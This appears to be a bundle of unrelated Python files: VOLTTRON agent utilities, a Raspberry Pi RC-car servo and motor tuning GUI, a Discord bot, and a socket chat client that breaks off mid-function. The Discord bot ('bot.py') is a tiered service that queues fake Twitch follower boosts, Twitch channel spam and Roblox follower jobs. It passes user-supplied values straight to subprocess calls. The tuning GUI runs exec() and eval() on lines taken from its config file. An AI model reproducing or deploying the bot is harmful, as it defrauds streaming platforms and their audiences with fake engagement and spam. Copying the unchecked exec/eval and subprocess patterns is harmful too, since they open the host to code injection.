config_path = os.environ.get('AGENT_CONFIG')
if config_path:
kwargs['config_path'] = config_path
agent = cls(**kwargs)
agent.run()
def start_agent_thread(cls, **kwargs):
"""Instantiate an agent class and run it in a new daemon thread.
Returns the thread object.
"""
import threading
agent = cls(**kwargs)
thread = threading.Thread(target=agent.run)
thread.daemon = True
thread.start()
return thread
def isapipe(fd):
fd = getattr(fd, 'fileno', lambda: fd)()
return stat.S_ISFIFO(os.fstat(fd).st_mode)
def default_main(agent_class, description=None, argv=sys.argv,
parser_class=argparse.ArgumentParser, **kwargs):
"""Default main entry point implementation for legacy agents.
description and parser_class are depricated. Please avoid using them.
"""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
try:
sub_addr = os.environ['AGENT_SUB_ADDR']
pub_addr = os.environ['AGENT_PUB_ADDR']
except KeyError as exc:
sys.stderr.write(
'missing environment variable: {}\n'.format(exc.args[0]))
sys.exit(1)
if sub_addr.startswith('ipc://') and sub_addr[6:7] != '@':
if not os.path.exists(sub_addr[6:]):
sys.stderr.write('warning: subscription socket does not '
'exist: {}\n'.format(sub_addr[6:]))
if pub_addr.startswith('ipc://') and pub_addr[6:7] != '@':
if not os.path.exists(pub_addr[6:]):
sys.stderr.write('warning: publish socket does not '
'exist: {}\n'.format(pub_addr[6:]))
config = os.environ.get('AGENT_CONFIG')
agent = agent_class(subscribe_address=sub_addr,
publish_address=pub_addr,
config_path=config, **kwargs)
agent.run()
except KeyboardInterrupt:
pass
def vip_main(agent_class, identity=None, version='0.1', **kwargs):
"""Default main entry point implementation for VIP agents."""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
# Quiet printing of KeyboardInterrupt by greenlets
Hub = gevent.hub.Hub
Hub.NOT_ERROR = Hub.NOT_ERROR + (KeyboardInterrupt,)
config = os.environ.get('AGENT_CONFIG')
identity = os.environ.get('AGENT_VIP_IDENTITY', identity)
if identity is not None:
if not is_valid_identity(identity):
_log.warn('Deprecation warining')
_log.warn(
'All characters in {identity} are not in the valid set.'
.format(idenity=identity))
address = get_address()
agent_uuid = os.environ.get('AGENT_UUID')
volttron_home = get_home()
agent = agent_class(config_path=config, identity=identity,
address=address, agent_uuid=agent_uuid,
volttron_home=volttron_home,
version=version, **kwargs)
try:
run = agent.run
except AttributeError:
run = agent.core.run
task = gevent.spawn(run)
try:
task.join()
finally:
task.kill()
except KeyboardInterrupt:
pass
class SyslogFormatter(logging.Formatter):
_level_map = {logging.DEBUG: syslog.LOG_DEBUG,
logging.INFO: syslog.LOG_INFO,
logging.WARNING: syslog.LOG_WARNING,
logging.ERROR: syslog.LOG_ERR,
logging.CRITICAL: syslog.LOG_CRIT}
def format(self, record):
level = self._level_map.get(record.levelno, syslog.LOG_INFO)
return '<{}>'.format(level) + super(SyslogFormatter, self).format(
record)
class JsonFormatter(logging.Formatter):
def format(self, record):
dct = record.__dict__.copy()
dct["msg"] = record.getMessage()
dct.pop('args')
exc_info = dct.pop('exc_info', None)
if exc_info:
dct['exc_text'] = ''.join(traceback.format_exception(*exc_info))
return jsonapi.dumps(dct)
class AgentFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
if fmt is None:
fmt = '%(asctime)s %(composite_name)s %(levelname)s: %(message)s'
super(AgentFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def composite_name(self, record):
if record.name == 'agents.log':
cname = '(%(processName)s %(process)d) %(remote_name)s'
elif record.name.startswith('agents.std'):
cname = '(%(processName)s %(process)d) <{}>'.format(
record.name.split('.', 2)[1])
else:
cname = '() %(name)s'
return cname % record.__dict__
def format(self, record):
if 'composite_name' not in record.__dict__:
record.__dict__['composite_name'] = self.composite_name(record)
if len(record.args) > 0 \
and 'tornado.access' in record.__dict__['composite_name']:
record.__dict__['msg'] = ','.join([str(b) for b in record.args])
record.__dict__['args'] = []
return super(AgentFormatter, self).format(record)
def setup_logging(level=logging.DEBUG):
root = logging.getLogger()
if not root.handlers:
handler = logging.StreamHandler()
if isapipe(sys.stderr) and '_LAUNCHED_BY_PLATFORM' in os.environ:
handler.setFormatter(JsonFormatter())
else:
fmt = '%(asctime)s %(name)s %(levelname)s: %(message)s'
handler.setFormatter(logging.Formatter(fmt))
root.addHandler(handler)
root.setLevel(level)
def format_timestamp(time_stamp):
"""Create a consistent datetime string representation based on
ISO 8601 format.
YYYY-MM-DDTHH:MM:SS.mmmmmm for unaware datetime objects.
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM for aware datetime objects
:param time_stamp: value to convert
:type time_stamp: datetime
:returns: datetime in string format
:rtype: str
"""
time_str = time_stamp.strftime("%Y-%m-%dT%H:%M:%S.%f")
if time_stamp.tzinfo is not None:
sign = '+'
td = time_stamp.tzinfo.utcoffset(time_stamp)
if td.days < 0:
sign = '-'
td = -td
seconds = td.seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
time_str += "{sign}{HH:02}:{MM:02}".format(sign=sign,
HH=hours,
MM=minutes)
return time_str
def parse_timestamp_string(time_stamp_str):
"""
Create a datetime object from the supplied date/time string.
Uses dateutil.parse with no extra parameters.
For performance reasons we try
YYYY-MM-DDTHH:MM:SS.mmmmmm
or
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM
based on the string length before falling back to dateutil.parse.
@param time_stamp_str:
@return: value to convert
"""
if len(time_stamp_str) == 26:
try:
return datetime.strptime(time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
pass
elif len(time_stamp_str) == 32:
try:
base_time_stamp_str = time_stamp_str[:26]
time_zone_str = time_stamp_str[26:]
time_stamp = datetime.strptime(base_time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
# Handle most common case.
if time_zone_str == "+00:00":
return time_stamp.replace(tzinfo=pytz.UTC)
hours_offset = int(time_zone_str[1:3])
minutes_offset = int(time_zone_str[4:6])
seconds_offset = hours_offset * 3600 + minutes_offset * 60
if time_zone_str[0] == "-":
seconds_offset = -seconds_offset
return time_stamp.replace(tzinfo=tzoffset("", seconds_offset))
except ValueError:
pass
return parse(time_stamp_str)
def get_aware_utc_now():
"""Create a timezone aware UTC datetime object from the system time.
:returns: an aware UTC datetime object
:rtype: datetime
"""
utcnow = datetime.utcnow()
utcnow = pytz.UTC.localize(utcnow)
return utcnow
def get_utc_seconds_from_epoch(timestamp=None):
"""
convert a given time stamp to seconds from epoch based on utc time. If
given time is naive datetime it is considered be local to where this
code is running.
@param timestamp: datetime object
@return: seconds from epoch
"""
if timestamp is None:
timestamp = datetime.now(tz=tzutc())
if timestamp.tzinfo is None:
local_tz = get_localzone()
# Do not use datetime.replace(tzinfo=local_tz) instead use localize()
timestamp = local_tz.localize(timestamp)
# utctimetuple can be called on aware timestamps and it will
# convert to UTC first.
seconds_from_epoch = calendar.timegm(timestamp.utctimetuple())
# timetuple loses microsecond accuracy so we have to put it back.
seconds_from_epoch += timestamp.microsecond / 1000000.0
return seconds_from_epoch
def process_timestamp(timestamp_string, topic=''):
"""
Convert timestamp string timezone aware utc timestamp
@param timestamp_string: datetime string to parse
@param topic: topic to which parse errors are published
@return: UTC datetime object and the original timezone of input datetime
"""
if timestamp_string is None:
_log.error("message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse_timestamp_string(timestamp_string)
except (ValueError, TypeError):
_log.error("message for {topic} bad timetamp string: {ts_string}"
.format(topic=topic, ts_string=timestamp_string))
return
if timestamp.tzinfo is None:
timestamp = timestamp.replace(tzinfo=pytz.UTC)
original_tz = None
else:
original_tz = timestamp.tzinfo
timestamp = timestamp.astimezone(pytz.UTC)
return timestamp, original_tz
def watch_file(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback()
def watch_file_with_fullpath(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback(fullpath)
def create_file_if_missing(path, permission=0o660, contents=None):
dirname = os.path.dirname(path)
if dirname and not os.path.exists(dirname):
try:
os.makedirs(dirname)
except OSError as e:
if e.errno != errno.EEXIST:
raise
try:
open(path)
except IOError as exc:
if exc.errno != errno.ENOENT:
raise
_log.debug('missing file %s', path)
_log.info('creating file %s', path)
fd = os.open(path, os.O_CREAT | os.O_WRONLY, permission)
try:
if contents:
os.write(fd, contents)
finally:
os.close(fd)
def fix_sqlite3_datetime(sql=None):
"""Primarily for fixing the base historian cache on certain versions
of python.
Registers a new datetime converter to that uses dateutil parse. This
should
better resolve #216, #174, and #91 without the goofy workarounds that
change data.
Optional sql argument is for testing only.
"""
if sql is None:
import sqlite3 as sql
sql.register_adapter(datetime, format_timestamp)
sql.register_converter("timestamp", parse_timestamp_string)
|
tatamiracer_test.py
|
# TatamiRacer Test for Steering Servo and Motor
import pigpio
import tkinter as tk
from tkinter import messagebox
import numpy as np
import os
import re
import time
import threading
pi = pigpio.pi()
gpio_pin0 = 13 #Motor1
gpio_pin1 = 19 #Motor2
gpio_pin2 = 14 #Servo
fname = os.getcwd()+r'/myconfig.py' #for Donkey Car parameter file
#Variable
class cfg: #parameter
pass
root = tk.Tk()
motor = tk.IntVar()
servo = tk.IntVar()
servo_center = tk.IntVar()
servo_limit = tk.IntVar()
servo_limit_flag = tk.BooleanVar()
throttle_boost_enable_flag = tk.BooleanVar()
throttle = tk.DoubleVar()
steering = tk.DoubleVar()
throttle_start_boost = tk.DoubleVar()
throttle_start_boost_time = tk.DoubleVar()
throttle_upper_limit = tk.DoubleVar()
throttle_lower_limit = tk.DoubleVar()
throttle_steering_boost = tk.DoubleVar()
steering_feel = tk.DoubleVar()
steering_balance = tk.DoubleVar()
throttle_start_boost_time0 = 0.0
throttle_start_boost_val = 0.0
throttle_deadzone=0.01
timer_enable = True
def timer100ms():
global throttle_start_boost_val,throttle_start_boost_time0
if not timer_enable:
return
throttle_abs = np.abs(throttle.get())
t_current = time.time()
if throttle_abs<=throttle_deadzone:
throttle_start_boost_time0 = t_current
#Throttle Boost
t = t_current-throttle_start_boost_time0
if(t <= throttle_start_boost_time.get()):
throttle_start_boost_val = throttle_start_boost.get() #Boost mode
else:
throttle_start_boost_val = 0.0
set_throttle(0)
t = threading.Timer(0.1, timer100ms)
t.start()
def set_timer():
t = threading.Thread(target=timer100ms)
t.start()
return t
def set_config():
servo_max= cfg.TATAMI_STEERING_LEFT_PWM
servo_min= cfg.TATAMI_STEERING_RIGHT_PWM
tmp=int(servo_max-servo_min)/2
servo_limit.set(tmp)
servo_limit_flag.set(True)
throttle_boost_enable_flag.set(True)
servo_center.set(servo_min+tmp)
servo.set(servo_center.get())
motor.set(0)
throttle.set(0)
steering.set(0)
set_motor(0)
set_servo(0)
steering_feel.set(cfg.TATAMI_STEERING_FEEL)
steering_balance.set(cfg.TATAMI_STEERING_BALANCE)
throttle_start_boost_time.set(cfg.TATAMI_THROTTLE_START_BOOST_TIME)
throttle_start_boost.set(cfg.TATAMI_THROTTLE_START_BOOST)
throttle_upper_limit.set(cfg.TATAMI_THROTTLE_UPPER_LIMIT)
throttle_lower_limit.set(cfg.TATAMI_THROTTLE_LOWER_LIMIT)
throttle_steering_boost.set(cfg.TATAMI_THROTTLE_STEERING_BOOST)
status()
status2()
disable_button()
def load_config():
f=open(fname)
datalist=f.readlines()
f.close()
i=0
for s in datalist:
tmp = re.match(r'^(TATAMI_[A-z_0-9]+\s*[=].+)#',s)
if tmp:
exec('cfg.'+tmp.groups()[0])
i=i+1
set_config()
def save_config():
ret = messagebox.askyesno('Write configuration','Write myconfig.py?')
if not ret:return
f = open(fname)
datalist=f.readlines()
f.close()
servo_max = servo_center.get()+servo_limit.get()
servo_min = servo_center.get()-servo_limit.get()
cfg.TATAMI_STEERING_LEFT_PWM = servo_max
cfg.TATAMI_STEERING_RIGHT_PWM = servo_min
cfg.TATAMI_STEERING_FEEL=steering_feel.get()
cfg.TATAMI_STEERING_BALANCE=steering_balance.get()
cfg.TATAMI_THROTTLE_START_BOOST_TIME=throttle_start_boost_time.get()
cfg.TATAMI_THROTTLE_START_BOOST=throttle_start_boost.get()
cfg.TATAMI_THROTTLE_UPPER_LIMIT=throttle_upper_limit.get()
cfg.TATAMI_THROTTLE_LOWER_LIMIT=throttle_lower_limit.get()
cfg.TATAMI_THROTTLE_STEERING_BOOST=throttle_steering_boost.get()
print('Write Parameter into:' + fname)
i = 0
for s in datalist:
tmp = re.match(r'^(TATAMI_[A-z_0-9]+)\s*[=].+(#.+$)',s)
if tmp:
varname =tmp.groups()[0]
val = str( eval('cfg.'+varname) )
comment = tmp.groups()[1]
d = varname+" = "+val+" "+comment
datalist[i] = d+"\n"
print(d)
i = i + 1
f=open(fname,'w')
f.writelines(datalist)
f.close()
def init_config():
load_config()
set_config()
def set_motor(motor_level):
motor_v=int(motor_level)
if motor_v > 0:
pi.set_PWM_range(gpio_pin0, 100) # Set PWM range
pi.set_PWM_dutycycle(gpio_pin0, motor_v) # Set PWM duty
pi.set_PWM_frequency(gpio_pin0,490)
pi.set_PWM_dutycycle(gpio_pin1, 0) # PWM off
else:
pi.set_PWM_range(gpio_pin1, 100) # Set PWM range
pi.set_PWM_dutycycle(gpio_pin1, -motor_v) # Set PWM duty
pi.set_PWM_frequency(gpio_pin1,490)
pi.set_PWM_dutycycle(gpio_pin0, 0) # PWM off
def set_servo(x):
servo_v = servo.get()
servo_max = servo_center.get()+servo_limit.get()
servo_min = servo_center.get()-servo_limit.get()
if servo_limit_flag.get() and servo_v > servo_max:
servo_v = servo_max
elif servo_limit_flag.get() and servo_v < servo_min:
servo_v = servo_min
pi.set_mode(gpio_pin2, pigpio.OUTPUT)
pi.set_servo_pulsewidth(gpio_pin2, servo_v )
servo.set(servo_v)
status()
def set_throttle(x):
global throttle_start_boost_val
th_in = throttle.get()
throttle_abs = np.abs(th_in)
#Steering Boost
angle_adjust = throttle_lower_limit.get()+np.abs(steering.get())*(throttle_steering_boost.get()-throttle_lower_limit.get())
#Feeling
if throttle_abs < throttle_lower_limit.get():
throttle_feel = throttle_lower_limit.get()
elif throttle_abs > throttle_upper_limit.get():
throttle_feel = throttle_upper_limit.get()
else:
slope = throttle_upper_limit.get()-throttle_lower_limit.get()
throttle_feel = throttle_lower_limit.get() + throttle_abs*slope
if throttle_abs > throttle_deadzone:
if throttle_boost_enable_flag.get():
th = np.sign(th_in)*max(throttle_start_boost_val,angle_adjust,throttle_feel)
else:
th = th_in
else:
th=0
s1.set(th*100)
def set_steering(x):
angle = steering.get()
#Steering Feeling Adjustment
ang_abs=np.abs(angle)
steering_half=0.5
if ang_abs < steering_half:
slope = steering_feel.get()/steering_half
angle = np.sign(angle)*ang_abs*slope
else:
slope = (1.0-steering_feel.get())/(1.0-steering_half)
angle = np.sign(angle)* (steering_feel.get()+(ang_abs-steering_half)*slope)
#Steering Balance Adjustment
if angle>0:
angle = angle * (1.0+steering_balance.get())
else:
angle = angle * (1.0-steering_balance.get())
v = servo_center.get()-servo_limit.get()*angle
s2.set(v)
set_throttle(0)
def status():
servo_offset = servo.get()-servo_center.get()
servo_max = servo_center.get()+servo_limit.get()
servo_min = servo_center.get()-servo_limit.get()
s = ' Servo:'+str(servo_offset)
s = s+' Limit:'+str(servo_limit.get())
s = s+' (Min:'+str(servo_min)
s = s+ ' Center:'+str(servo_center.get())
s = s+' Max:'+str(servo_max)+')'
l1.config(text=s)
def status2():
s = 'Start Boost:'+str(throttle_start_boost.get())
s = s + ' Steering Boost:'+str(throttle_steering_boost.get())
s = s + ' Lower Limit:'+str(throttle_lower_limit.get())
s = s + ' Upper Limit:'+str(throttle_upper_limit.get())
l2.config(text=s)
def disable_button():
if servo_limit_flag.get():
b3.config(state=tk.DISABLED)
b4.config(state=tk.DISABLED)
else:
b3.config(state=tk.NORMAL)
b4.config(state=tk.NORMAL)
if throttle_boost_enable_flag.get():
b12.config(state=tk.DISABLED)
b11.config(state=tk.DISABLED)
b9.config(state=tk.DISABLED)
b8.config(state=tk.DISABLED)
else:
b12.config(state=tk.NORMAL)
b11.config(state=tk.NORMAL)
b9.config(state=tk.NORMAL)
b8.config(state=tk.NORMAL)
#GUI
root.title('TatamiRacer Test')
root.minsize(width=640, height=480)
#Make GUI
f1=tk.Frame(root)
f1.pack(fill = tk.BOTH)
f3=tk.Frame(root)
f3.pack(fill = tk.BOTH)
f4=tk.Frame(root)
f4.pack(fill = tk.BOTH)
f7=tk.Frame(root)
f7.pack(fill = tk.BOTH)
f6=tk.Frame(root)
f6.pack(fill = tk.BOTH)
f5=tk.Frame(root)
f5.pack(fill = tk.BOTH)
f2=tk.Frame(root)
f2.pack(fill = tk.BOTH)
s1 = tk.Scale(f1, label = 'Motor PWM: ', orient = 'h', from_ = -100.0,
to = 100.0, variable = motor, command = set_motor)
s1.pack(fill = tk.BOTH)
b1 = tk.Button(f1, text= 'Off', command = lambda :s1.set(0) )
b1.pack()
s2 = tk.Scale(f1, label = 'Servo PWM: ', orient = 'h',
from_ = 500.0, to = 2500.0, variable = servo, command =set_servo)
s2.pack(fill=tk.BOTH)
l1 = tk.Label(f3, width=100, text='')
l1.pack(fill=tk.BOTH)
b2 = tk.Button(f1, text= 'Center', command = lambda :[s2.set(servo_center.get()),status()])
b2.pack()
l1.pack(fill=tk.BOTH)
b2.pack()
c1 = tk.Checkbutton(f1, text= 'Enable Servo Limit' ,variable = servo_limit_flag,
command = lambda :[s2.set(servo_center.get()),disable_button()] )
c1.pack(side=tk.RIGHT)
b4 = tk.Button(f1, text= 'Set Servo Limit',
command = lambda :[servo_limit.set( np.abs(servo.get()-servo_center.get() )),status()])
b4.pack(side=tk.RIGHT)
b3 = tk.Button(f1, text= 'Set Servo Center',
command = lambda:[servo_center.set(servo.get()),status()])
b3.pack(side=tk.RIGHT)
s3 = tk.Scale(f4, label = 'Throttle Level: ', orient = 'h',
from_ = -1.0, to = 1.0, resolution=0.01, variable = throttle, command= set_throttle)
s3.pack(fill=tk.BOTH)
b10 = tk.Button(f7, text= 'Forward >', command = lambda:s3.set(0.1) )
b10.pack(side=tk.RIGHT,ipadx=120)
b15 = tk.Button(f7, text= 'Stop', command = lambda:s3.set(0) )
b15.pack(side=tk.RIGHT,ipadx=120)
b16 = tk.Button(f7, text= '< Backward', command = lambda:s3.set(-0.1) )
b16.pack(side=tk.RIGHT,ipadx=120)
c2 = tk.Checkbutton(f4, text= 'Enable Boost&Limit' ,variable = throttle_boost_enable_flag,
command = lambda :[disable_button(),s3.set(0)] )
c2.pack(side=tk.RIGHT)
b12 = tk.Button(f4, text= 'Set Upper Limit',
command = lambda: [throttle_upper_limit.set(s3.get()),status2()] )
b12.pack(side=tk.RIGHT)
b11 = tk.Button(f4, text= 'Set Lower Limit',
command = lambda: [throttle_lower_limit.set(s3.get()),status2()] )
b11.pack(side=tk.RIGHT)
b9 = tk.Button(f4, text= 'Set Steering Boost',
command = lambda:[throttle_steering_boost.set(s3.get()),status2()] )
b9.pack(side=tk.RIGHT)
b8 = tk.Button(f4, text= 'Set Start Boost',
command = lambda:[throttle_start_boost.set(s3.get()),status2()] )
b8.pack(side=tk.RIGHT)
s4 = tk.Scale(f5, label = 'Steering Level: ', orient = 'h',
from_ = -1.0, to = 1.0, resolution=0.01, variable = steering, command = set_steering)
s4.pack(fill=tk.BOTH)
b13 = tk.Button(f5, text= 'Center', command = lambda:s4.set(0) )
b13.pack()
s5 = tk.Scale(f5, label = 'Steering Feel:', orient = 'h',length=320,
from_ = 0.1, to = 0.9, resolution=0.01, variable = steering_feel )
s5.pack(side=tk.RIGHT)
s6 = tk.Scale(f5, label = 'Steering Balance:', orient = 'h',length=320,
from_ = -0.9, to = 0.9, resolution=0.01, variable = steering_balance )
s6.pack(side=tk.RIGHT)
s7 = tk.Scale(f5, label = 'Start Boost Time:', orient = 'h',length=320,
from_ = 0.0, to = 3.0, resolution=0.1, variable = throttle_start_boost_time )
s7.pack(side=tk.RIGHT)
l2 = tk.Label(f6, width=100, text='-')
l2.pack(fill=tk.BOTH)
b14 = tk.Button(f2, text= 'Close', command = lambda :root.destroy() )
b14.pack(side=tk.RIGHT)
b5 = tk.Button(f2, text= 'Write myconfig.py', command = save_config )
b5.pack(side=tk.RIGHT)
b7 = tk.Button(f2, text= 'Load myconfig.py',
command = lambda :[load_config(),s2.set(servo_center.get()),status(),status2()] )
b7.pack(side=tk.RIGHT)
#Start
init_config()
status()
disable_button()
timer_thread=set_timer()
root.mainloop()
#Exit
timer_enable = False
pi.set_mode(gpio_pin0, pigpio.INPUT)
pi.set_mode(gpio_pin1, pigpio.INPUT)
pi.set_mode(gpio_pin2, pigpio.INPUT)
pi.stop()
time.sleep(1)
print('TatamiRacer Test End')
|
bot.py
|
from discord.ext import commands
import subprocess
import threading
import aiofiles
import discord
import asyncio
import aiohttp
import random
import ctypes
import re
import os
ctypes.windll.kernel32.SetConsoleTitleW('zoom')
token = ''
prefix = '/'
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, case_insensitive=True, intents=intents)
bot.remove_command('help')
administrators = []
chat_channel = ''
bots_channel = ''
queue = []
def zoom():
while True:
try:
task, arg1, arg2 = queue.pop(0).split('-')
subprocess.run([f'{task}', f'{arg1}', f'{arg2}'])
except:
pass
threading.Thread(target=zoom).start()
@bot.event
async def on_ready():
print(f'Servers: {len(bot.guilds)}')
for guild in bot.guilds:
print(guild.name)
print()
while True:
members = sum([guild.member_count for guild in bot.guilds])
activity = discord.Activity(type=discord.ActivityType.watching, name=f'{members} users!')
await bot.change_presence(activity=activity)
await asyncio.sleep(60)
@bot.event
async def on_member_join(member):
channel = await bot.fetch_channel(bots_channel)
await channel.send(f'Welcome to **zoom**, {member.mention}.\nType `/help` to get started!')
@bot.event
async def on_command_error(ctx, error: Exception):
if ctx.channel.id == bots_channel:
if isinstance(error, commands.CommandOnCooldown):
embed = discord.Embed(color=16379747, description=f'{error}')
await ctx.send(embed=embed)
elif isinstance(error, commands.MissingRequiredArgument):
embed = discord.Embed(color=16379747, description='You are missing arguments required to run this command!')
await ctx.send(embed=embed)
ctx.command.reset_cooldown(ctx)
elif 'You do not own this bot.' in str(error):
embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
await ctx.send(embed=embed)
else:
print(str(error))
else:
try:
await ctx.message.delete()
except:
pass
@bot.command()
async def help(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /help')
if ctx.channel.type != discord.ChannelType.private:
embed = discord.Embed(color=16379747)
embed.add_field(name='Help', value='`/help`', inline=True)
embed.add_field(name='Open Ticket', value='`/ticket`', inline=True)
embed.add_field(name='Close Ticket', value='`/close`', inline=True)
embed.add_field(name='Tasks', value='`/tasks`', inline=True)
embed.add_field(name='Twitch Followers', value='`/tfollow (channel)`', inline=True)
embed.add_field(name='⭐ Twitch Spam', value='`/tspam (channel) (message)`', inline=True)
embed.add_field(name='Roblox Followers', value='`/rfollow (user id)`', inline=True)
embed.add_field(name='Roblox Templates', value='`/rget (asset id)`', inline=True)
await ctx.send(embed=embed)
@bot.command()
async def ticket(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /ticket')
if ctx.channel.type != discord.ChannelType.private:
channels = [str(x) for x in bot.get_all_channels()]
if f'ticket-{ctx.author.id}' in str(channels):
embed = discord.Embed(color=16379747, description='You already have a ticket open!')
await ctx.send(embed=embed)
else:
ticket_channel = await ctx.guild.create_text_channel(f'ticket-{ctx.author.id}')
await ticket_channel.set_permissions(ctx.guild.get_role(ctx.guild.id), send_messages=False, read_messages=False)
await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
embed = discord.Embed(color=16379747, description='Please enter the reason for this ticket, type `/close` if you want to close this ticket.')
await ticket_channel.send(f'{ctx.author.mention}', embed=embed)
await ctx.message.delete()
@bot.command()
async def close(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /close')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.name == f'ticket-{ctx.author.id}':
await ctx.channel.delete()
elif ctx.author.id in administrators and 'ticket' in ctx.channel.name:
await ctx.channel.delete()
else:
embed = discord.Embed(color=16379747, description=f'You do not have permission to run this command!')
await ctx.send(embed=embed)
@bot.command()
async def tasks(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /tasks')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel:
embed = discord.Embed(color=16379747, description=f'`{len(queue)}` tasks in the queue!')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
tfollow_cooldown = []
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def tfollow(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> /tfollow {channel}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrators:
if str(channel.lower()) in tfollow_cooldown and ctx.author.id not in administrators:
try:
await ctx.message.delete()
except:
pass
else:
try:
if '-' in str(channel):
raise Exception
max_amount = 0
if ctx.author.id in administrators:
tfollow.reset_cooldown(ctx)
max_amount += 1000
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
max_amount += 1000
diamond = discord.utils.get(ctx.guild.roles, name='Diamond')
if diamond in ctx.author.roles:
max_amount += 750
gold = discord.utils.get(ctx.guild.roles, name='Gold')
if gold in ctx.author.roles:
max_amount += 450
silver = discord.utils.get(ctx.guild.roles, name='Silver')
if silver in ctx.author.roles:
max_amount += 250
bronze = discord.utils.get(ctx.guild.roles, name='Bronze')
if bronze in ctx.author.roles:
max_amount += 100
booster = discord.utils.get(ctx.guild.roles, name='Booster')
if booster in ctx.author.roles:
max_amount += 75
_75 = discord.utils.get(ctx.guild.roles, name='+75')
if _75 in ctx.author.roles:
max_amount += 75
_25 = discord.utils.get(ctx.guild.roles, name='+25')
if _25 in ctx.author.roles:
max_amount += 25
_10 = discord.utils.get(ctx.guild.roles, name='+10')
if _10 in ctx.author.roles:
max_amount += 10
_5 = discord.utils.get(ctx.guild.roles, name='+5')
if _5 in ctx.author.roles:
max_amount += 5
max_amount += 25
if amount is None:
amount = max_amount
elif amount > max_amount:
amount = max_amount
if amount <= max_amount:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
position = len(queue) + 1
# embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`1/{position}`)')
embed = discord.Embed(color=16379747, description=f'Adding `{amount}` followers to `{channel}`! (`1/{position}`)')
await ctx.send(embed=embed)
queue.insert(0, f'tfollow-{channel}-{amount}')
else:
position = len(queue) + 1
# embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`{position}/{position}`)')
embed = discord.Embed(color=16379747, description=f'Adding `{amount}` followers to `{channel}`! (`{position}/{position}`)')
await ctx.send(embed=embed)
queue.append(f'tfollow-{channel}-{amount}')
if ctx.author.id not in administrators:
tfollow_cooldown.append(str(channel.lower()))
await asyncio.sleep(600)
tfollow_cooldown.remove(str(channel.lower()))
except:
embed = discord.Embed(color=16379747, description='An error has occured while attempting to run this command!')
await ctx.send(embed=embed)
tfollow.reset_cooldown(ctx)
else:
await ctx.message.delete()
tfollow.reset_cooldown(ctx)
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def tspam(ctx, channel, *, msg):
print(f'{ctx.author} | {ctx.author.id} -> /tspam {channel} {msg}')
if ctx.channel.type != discord.ChannelType.private:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
if ctx.channel.id == bots_channel:
try:
max_amount = 0
if ctx.author.id in administrators:
tspam.reset_cooldown(ctx)
max_amount += 25
amount = None
if amount is None:
amount = max_amount
if amount <= max_amount:
position = len(queue) + 1
embed = discord.Embed(color=16379747, description=f'Added `tspam-{channel}-{msg}` to queue! (`1/{position}`)')
await ctx.send(embed=embed)
queue.insert(0, f'tspam-{channel}-{msg}')
except:
embed = discord.Embed(color=16379747, description='An error has occured while attempting to run this command!')
await ctx.send(embed=embed)
tspam.reset_cooldown(ctx)
else:
await ctx.message.delete()
tspam.reset_cooldown(ctx)
else:
embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
await ctx.send(embed=embed)
rfollow_cooldown = []
bot.run(token)
|
client.py
|
import os
import socket
import threading
import sys
from time import sleep
# Const variables
if len(sys.argv) == 3:
HOST: str = str(sys.argv[1])
PORT: int = int(sys.argv[2])
else:
HOST: str = "127.0.0.1"
PORT: int = 6666
# Ask a nickname
nickname = input("Enter your nickname for the chat : ")
# Create a socket and connect to the server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((HOST, PORT))
def receive():
"""Main function to wait message from the server"""
while True:
try:
message = client.recv(1024).decode("utf8")
# If message == NICK, send the nickname to the server
if message == "NICK":
client.send(nickname.encode("utf8"))
# If message == KICKED, print a message, close the connection and exit
if message == "KICKED":
print("SERVER >> You have been kicked")
client.close()
os._exit(0)
# If message != PING show the message
elif message != "PING":
